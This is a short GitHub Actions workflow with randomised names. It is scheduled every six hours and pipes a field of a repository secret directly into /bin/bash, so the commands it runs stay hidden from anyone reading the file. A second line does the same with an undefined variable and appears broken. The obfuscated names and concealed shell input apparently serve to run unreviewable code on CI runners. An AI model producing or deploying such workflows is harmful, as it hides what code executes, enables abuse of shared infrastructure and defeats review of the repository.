name: dishufazee
on:
  workflow_dispatch:
  schedule:
    - cron: '44 2/6 * * *'

jobs:  # 10993
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dishufazee
        env:
          vwk46549: ${{ secrets.vwk46549 }}
        run: |
          echo $vwk46549 | jq -r .od65 | /bin/bash
          echo $hif03 | jq -r .ncp9 | /bin/bash

